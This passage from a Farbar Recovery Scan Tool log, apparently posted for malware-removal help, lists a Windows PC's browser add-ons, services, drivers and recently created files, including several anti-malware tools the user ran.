target="_blank">http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS</a></p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> 
{b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}" target="_blank">https://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=282369&p={searchTerms}</a></p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = <a href="http://rover.ebay.com/rover/1/711-154371-11896-2/4" target="_blank">http://rover.ebay.com/rover/1/711-154371-11896-2/4</a> ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}</p><p>BHO: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)</p><p>BHO: Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\x64\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll (IvoSoft)</p><p>BHO-x32: Content Blocker Plugin -> {03C04F0A-E2A3-4F7F-BA30-BFA06FFD1358} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)</p><p>BHO-x32: ExplorerBHO Class -> {449D0D6E-2412-4E61-B68F-1CB625CD9E52} -> C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)</p><p>BHO-x32: 
Virtual Keyboard Plugin -> {B5D5BB14-C8E2-478D-9C97-574AC10AF9E8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO-x32: Safe Money Plugin -> {E3D96E85-529D-4269-AC6A-97CF9E2221E3} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\IEExt\ie_plugin.dll (Kaspersky Lab ZAO)</p><p>BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)</p><p>BHO-x32: ClassicIE9BHO Class -> {EA801577-E6AD-4BD5-8F71-4BE0154331A4} -> C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll (IvoSoft)</p><p>Toolbar: HKLM - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)</p><p>Toolbar: HKLM-x32 - Classic Explorer Bar - {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)</p><p>Tcpip\Parameters: [DhcpNameServer] 192.168.1.1</p><p></p><p>FireFox:</p><p>========</p><p>FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)</p><p>FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll ( HP)</p><p>FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)</p><p>FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)</p><p>FF Plugin-x32: @kaspersky.com/content_blocker_6418E0D362104DADA084DC312DFA8ABC -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:content_blocker@kaspersky.com">content_blocker@kaspersky.com</a> ()</p><p>FF Plugin-x32: 
@kaspersky.com/online_banking_69A4E213815F42BD863D889007201D82 -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:online_banking@kaspersky.com">online_banking@kaspersky.com</a> ()</p><p>FF Plugin-x32: @kaspersky.com/virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:virtual_keyboard@kaspersky.com">virtual_keyboard@kaspersky.com</a> ()</p><p>FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)</p><p>FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)</p><p>FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL (Nero AG)</p><p>FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)</p><p>FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)</p><p>FF Plugin-x32: @videolan.org/vlc,version=2.0.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)</p><p>FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)</p><p>FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll ()</p><p>FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)</p><p>FF HKLM-x32\...\Firefox\Extensions: [<a href="mailto:content_blocker_6418E0D362104DADA084DC312DFA8ABC@kaspersky.com">content_blocker_6418E0D362104DADA084DC312DFA8ABC@kaspersky.com</a>] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a 
href="mailto:content_blocker@kaspersky.com">content_blocker@kaspersky.com</a></p><p>FF Extension: Dangerous Websites Blocker - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:content_blocker@kaspersky.com">content_blocker@kaspersky.com</a> [2014-12-01]</p><p>FF HKLM-x32\...\Firefox\Extensions: [<a href="mailto:virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB@kaspersky.com">virtual_keyboard_294FF26A1D5B455495946778FDE7CEDB@kaspersky.com</a>] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:virtual_keyboard@kaspersky.com">virtual_keyboard@kaspersky.com</a></p><p>FF Extension: Virtual Keyboard - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:virtual_keyboard@kaspersky.com">virtual_keyboard@kaspersky.com</a> [2014-12-01]</p><p>FF HKLM-x32\...\Firefox\Extensions: [<a href="mailto:online_banking_69A4E213815F42BD863D889007201D82@kaspersky.com">online_banking_69A4E213815F42BD863D889007201D82@kaspersky.com</a>] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:online_banking@kaspersky.com">online_banking@kaspersky.com</a></p><p>FF Extension: Safe Money - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\FFExt\<a href="mailto:online_banking@kaspersky.com">online_banking@kaspersky.com</a> [2014-12-01]</p><p></p><p>Chrome: </p><p>=======</p><p>CHR Profile: C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default</p><p>CHR Extension: (Google Docs) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-05-08]</p><p>CHR Extension: (Google Drive) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-05-08]</p><p>CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-23]</p><p>CHR Extension: (YouTube) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-05-08]</p><p>CHR Extension: (Google Search) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-05-08]</p><p>CHR Extension: (Kaspersky Protection) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbhjdbfgekjfcfkkfjjmlmojhbllhbho [2014-12-01]</p><p>CHR Extension: (Website Logon) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\fegekclkdhbnfdcmomlpegkkndgnmfmo [2014-05-08]</p><p>CHR Extension: (Google Wallet) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-05-08]</p><p>CHR Extension: (Gmail) - C:\Users\johnsmith\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-05-08]</p><p>CHR HKLM-x32\...\Chrome\Extension: [dbhjdbfgekjfcfkkfjjmlmojhbllhbho] - <a href="https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho" target="_blank">https://chrome.google.com/webstore/detail/dbhjdbfgekjfcfkkfjjmlmojhbllhbho</a> []</p><p>CHR HKLM-x32\...\Chrome\Extension: [fegekclkdhbnfdcmomlpegkkndgnmfmo] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2012-07-12]</p><p></p><p>==================== Services (Whitelisted) =================</p><p></p><p>(If an entry is included in the fixlist, the service will be removed from the registry. 
The file will not be moved unless listed separately.)</p><p></p><p>R2 ADExchange; C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe [39528 2011-09-16] (ArcSoft Inc.)</p><p>S2 AVP15.0.1; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\avp.exe [234520 2014-08-30] (Kaspersky Lab ZAO)</p><p>R2 ClassicShellService; C:\Program Files\Classic Shell\ClassicShellService.exe [68608 2012-12-29] (IvoSoft) [File not signed]</p><p>R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641320 2012-08-10] (HP)</p><p>R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [85504 2012-08-10] (Hewlett-Packard Company) [File not signed]</p><p>R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)</p><p>R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)</p><p>R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)</p><p>R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2011-02-04] (Nalpeiron Ltd.) [File not signed]</p><p>R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [321536 2012-07-21] (IDT, Inc.) 
[File not signed]</p><p>S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]</p><p>R3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401256 2012-07-16] (AuthenTec, Inc.)</p><p>R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]</p><p>S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16032 2014-09-21] (Microsoft Corporation)</p><p></p><p>==================== Drivers (Whitelisted) ====================</p><p></p><p>(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)</p><p></p><p>R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)</p><p>R0 cm_km_w; C:\Windows\System32\DRIVERS\cm_km_w.sys [238288 2013-01-14] (Kaspersky Lab UK Ltd)</p><p>S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2014-12-01] ()</p><p>R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [468576 2014-03-31] (Kaspersky Lab ZAO)</p><p>R2 kldisk; C:\Windows\system32\DRIVERS\kldisk.sys [46144 2014-07-02] (Kaspersky Lab ZAO)</p><p>S0 klelam; C:\Windows\System32\DRIVERS\klelam.sys [29616 2012-07-27] (Kaspersky Lab)</p><p>R3 klflt; C:\Windows\system32\DRIVERS\klflt.sys [150536 2014-08-18] (Kaspersky Lab ZAO)</p><p>R1 klhk; C:\Windows\system32\DRIVERS\klhk.sys [247480 2014-08-12] (Kaspersky Lab ZAO)</p><p>R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [801288 2014-08-20] (Kaspersky Lab ZAO)</p><p>R1 KLIM6; C:\Windows\system32\DRIVERS\klim6.sys [30304 2014-02-25] (Kaspersky Lab ZAO)</p><p>S3 klkbdflt; C:\Windows\system32\DRIVERS\klkbdflt.sys [28768 2014-03-28] (Kaspersky Lab ZAO)</p><p>S3 klmouflt; C:\Windows\system32\DRIVERS\klmouflt.sys [29280 2013-08-08] (Kaspersky Lab ZAO)</p><p>R1 klpd; C:\Windows\system32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)</p><p>R1 klwfp; 
C:\Windows\system32\DRIVERS\klwfp.sys [69816 2014-07-25] (Kaspersky Lab ZAO)</p><p>R1 Klwtp; C:\Windows\system32\DRIVERS\klwtp.sys [74424 2014-08-13] (Kaspersky Lab ZAO)</p><p>R1 kneps; C:\Windows\system32\DRIVERS\kneps.sys [179776 2014-07-09] (Kaspersky Lab ZAO)</p><p>R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)</p><p>R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-12-01] (Malwarebytes Corporation)</p><p>R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-10-01] (Malwarebytes Corporation)</p><p>S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)</p><p>R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)</p><p>U3 TrueSight; C:\Windows\System32\Drivers\TrueSight.sys [34808 2014-11-19] ()</p><p>R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20288 2012-08-03] (Hewlett-Packard Development Company, L.P.)</p><p>S3 ALSysIO; \??\C:\Users\ADMINI~1\AppData\Local\Temp\ALSysIO64.sys [X]</p><p>S1 bcbus; \SystemRoot\System32\drivers\bcbus.sys [X]</p><p>R4 klkbdflt2; \SystemRoot\system32\DRIVERS\klkbdflt2.sys [X]</p><p></p><p>==================== NetSvcs (Whitelisted) ===================</p><p></p><p>(If an item is included in the fixlist, it will be removed from the registry. 
Any associated file could be listed separately to be moved.)</p><p></p><p></p><p>==================== One Month Created Files and Folders ========</p><p></p><p>(If an entry is included in the fixlist, the file\folder will be moved.)</p><p></p><p>2014-12-01 09:39 - 2014-12-01 09:39 - 00002330 _____ () C:\Users\johnsmith\Desktop\Safe Money.lnk</p><p>2014-12-01 09:38 - 2014-12-01 09:38 - 00002132 _____ () C:\Users\Public\Desktop\Kaspersky Internet Security.lnk</p><p>2014-12-01 09:38 - 2014-12-01 09:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kaspersky Internet Security</p><p>2014-12-01 09:38 - 2013-05-06 09:13 - 00110176 _____ (Kaspersky Lab ZAO) C:\Windows\system32\klfphc.dll</p><p>2014-12-01 09:36 - 2014-12-01 09:43 - 00000000 ____D () C:\ProgramData\Kaspersky Lab</p><p>2014-12-01 09:36 - 2014-12-01 09:36 - 00000000 ____D () C:\Program Files (x86)\Kaspersky Lab</p><p>2014-12-01 09:36 - 2014-08-20 18:04 - 00801288 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klif.sys</p><p>2014-12-01 09:36 - 2014-08-18 14:43 - 00150536 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klflt.sys</p><p>2014-12-01 09:36 - 2014-08-12 18:32 - 00247480 _____ (Kaspersky Lab ZAO) C:\Windows\system32\Drivers\klhk.sys</p><p>2014-12-01 09:28 - 2014-12-01 09:28 - 05005408 _____ () C:\Windows\system32\FNTCACHE.DAT</p><p>2014-12-01 09:25 - 2014-11-20 13:56 - 00713672 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe</p><p>2014-12-01 09:25 - 2014-11-20 13:56 - 00106440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl</p><p>2014-12-01 07:58 - 2014-12-01 09:30 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)</p><p>2014-12-01 07:58 - 2014-12-01 07:58 - 00000117 _____ () C:\Windows\system32\netcfg-763703.txt</p><p>2014-12-01 07:57 - 2014-12-01 08:59 - 00000000 ____D () C:\Users\johnsmith\Desktop\mbar</p><p>2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () 
C:\Windows\system32\netcfg-627218.txt</p><p>2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-624156.txt</p><p>2014-12-01 07:56 - 2014-12-01 07:56 - 00000117 _____ () C:\Windows\system32\netcfg-618343.txt</p><p>2014-12-01 07:51 - 2014-12-01 07:51 - 00001139 _____ () C:\Windows\system32\netcfg-333515.txt</p><p>2014-12-01 07:51 - 2014-12-01 07:51 - 00001134 _____ () C:\Windows\system32\netcfg-329937.txt</p><p>2014-12-01 07:48 - 2014-12-01 07:48 - 00000117 _____ () C:\Windows\system32\netcfg-157515.txt</p><p>2014-12-01 07:47 - 2014-12-01 07:47 - 00043664 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys</p><p>2014-12-01 07:22 - 2014-12-01 07:37 - 16448208 _____ (Malwarebytes Corp.) C:\Users\johnsmith\Desktop\mbar-1.08.2.1001.exe</p><p>2014-12-01 01:34 - 2014-10-08 21:00 - 01519104 _____ (Microsoft Corporation) C:\Windows\system32\vssapi.dll</p><p>2014-12-01 01:34 - 2014-10-08 21:00 - 01484288 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe</p><p>2014-12-01 01:34 - 2014-10-08 21:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\vsstrace.dll</p><p>2014-12-01 01:34 - 2014-10-08 20:59 - 01195520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll</p><p>2014-12-01 01:34 - 2014-10-08 20:59 - 00052224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vsstrace.dll</p><p>2014-12-01 01:34 - 2012-09-19 23:31 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\eventcls.dll</p><p>2014-12-01 01:34 - 2012-09-19 22:53 - 00015360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\eventcls.dll</p><p>2014-11-30 23:38 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe</p><p>2014-11-30 23:38 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe</p><p>2014-11-30 23:23 - 2014-10-11 00:44 - 19764736 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll</p><p>2014-11-30 23:23 - 2014-10-10 22:57 - 17562112 _____ (Microsoft 
Corporation) C:\Windows\SysWOW64\shell32.dll</p><p>2014-11-30 23:23 - 2014-10-08 20:59 - 00623616 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll</p><p>2014-11-30 23:23 - 2014-10-08 20:59 - 00212992 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll</p><p>2014-11-30 23:23 - 2014-10-08 20:58 - 00458240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dnsapi.dll</p><p>2014-11-30 23:23 - 2014-09-21 22:38 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll</p><p>2014-11-30 23:23 - 2014-09-21 20:56 - 00513536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll</p><p>2014-11-30 23:23 - 2014-04-19 02:39 - 00628024 _____ (Microsoft Corporation) C:\Windows\system32\NotificationUI.exe</p><p>2014-11-30 23:23 - 2014-04-19 01:45 - 00693760 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll</p><p>2014-11-30 23:23 - 2014-04-19 01:45 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll</p><p>2014-11-30 23:23 - 2014-04-18 23:57 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll</p><p>2014-11-30 23:23 - 2014-04-18 23:57 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll</p><p>2014-11-30 23:23 - 2014-01-30 17:48 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:45 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:44 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:44 - 00393216 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll</p><p>2014-11-30 23:19 - 2014-10-11 00:43 - 02307072 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:58 - 08858624 _____ (Microsoft Corporation) 
C:\Windows\SysWOW64\twinui.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:57 - 02416640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:57 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll</p><p>2014-11-30 23:19 - 2014-10-10 22:56 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll</p><p>2014-11-30 23:19 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll</p><p>2014-11-30 23:19 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll</p><p>2014-11-30 23:19 - 2013-12-04 16:43 - 00583680 _____ (Microsoft Corporation) C:\Windows\system32\msdrm.dll</p><p>2014-11-30 23:19 - 2013-12-04 16:37 - 00451072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdrm.dll</p><p>2014-11-30 23:19 - 2013-03-02 01:23 - 00375808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ReAgent.dll</p><p>2014-11-30 23:19 - 2013-03-01 19:44 - 01011200 _____ (Microsoft Corporation) C:\Windows\system32\reseteng.dll</p><p>2014-11-30 23:19 - 2012-12-14 21:55 - 00443392 _____ (Microsoft Corporation) C:\Windows\system32\ReAgent.dll</p><p>2014-11-30 23:18 - 2013-11-22 23:43 - 00420864 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll</p><p>2014-11-30 23:18 - 2013-11-22 22:05 - 00368640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll</p><p>2014-11-30 23:18 - 2013-08-23 00:22 - 02062848 _____ (Microsoft Corporation) C:\Windows\system32\d3d11.dll</p><p>2014-11-30 23:18 - 2013-08-22 18:44 - 01711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll</p><p>2014-11-30 23:18 - 2013-03-21 20:49 - 02382336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll</p><p>2014-11-30 23:18 - 2013-03-21 15:47 - 02851840 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll</p><p>2014-11-30 23:17 - 2014-01-30 17:48 - 01339392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll</p><p>2014-11-30 23:17 
- 2014-01-30 17:06 - 01628160 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll</p><p>2014-11-30 23:17 - 2013-10-31 22:38 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\msieftp.dll</p><p>2014-11-30 23:17 - 2013-10-31 20:49 - 00273408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msieftp.dll</p><p>2014-11-30 23:17 - 2013-04-02 16:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptdlg.dll</p><p>2014-11-30 23:17 - 2013-04-02 16:12 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\cryptdlg.dll</p><p>2014-11-30 23:17 - 2012-12-12 21:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll</p><p>2014-11-30 23:17 - 2012-12-12 20:59 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll</p><p>2014-11-30 23:06 - 2014-10-30 04:25 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe</p><p>2014-11-30 21:55 - 2014-11-30 21:55 - 00002362 _____ () C:\Windows\system32\.crusader</p><p>2014-11-30 21:38 - 2014-11-30 21:55 - 00000000 ____D () C:\ProgramData\HitmanPro</p><p>2014-11-30 21:38 - 2014-11-30 21:38 - 00001893 _____ () C:\Users\Public\Desktop\HitmanPro.lnk</p><p>2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro</p><p>2014-11-30 21:38 - 2014-11-30 21:38 - 00000000 ____D () C:\Program Files\HitmanPro</p><p>2014-11-30 21:35 - 2014-10-31 23:26 - 103374192 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe</p><p>2014-11-30 21:30 - 2014-11-30 21:35 - 32507072 _____ (Microsoft Corporation) C:\Users\johnsmith\Downloads\Windows-KB890830-x64-V5.18.exe</p><p>2014-11-30 21:28 - 2014-11-30 21:36 - 11222744 _____ (SurfRight B.V.) 
C:\Users\johnsmith\Downloads\HitmanPro_x64.exe</p><p>2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\Users\johnsmith\Desktop\removal tools</p><p>2014-11-30 21:06 - 2014-12-01 09:52 - 00000000 ____D () C:\FRST</p><p>2014-11-30 20:48 - 2014-11-30 20:48 - 04184008 _____ (Kaspersky Lab ZAO) C:\Users\johnsmith\Downloads\tdsskiller.exe</p><p>2014-11-30 20:34 - 2014-11-30 20:34 - 00000117 _____ () C:\Windows\system32\netcfg-26750.txt</p><p>2014-11-30 20:33 - 2014-11-30 20:33 - 00000117 _____ () C:\Windows\system32\netcfg-2834125.txt</p><p>2014-11-30 20:23 - 2014-11-30 20:29 - 00000000 ____D () C:\Users\johnsmith\Desktop\ReportMaker</p><p>2014-11-30 20:09 - 2014-11-30 20:10 - 06360161 _____ () C:\Users\johnsmith\Downloads\ReportMaker.1417400617.exe</p><p>2014-11-30 20:01 - 2014-12-01 09:40 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys</p><p>2014-11-30 20:00 - 2014-12-01 07:57 - 00096472 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00001102 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware</p><p>2014-11-30 20:00 - 2014-11-30 20:00 - 00000000 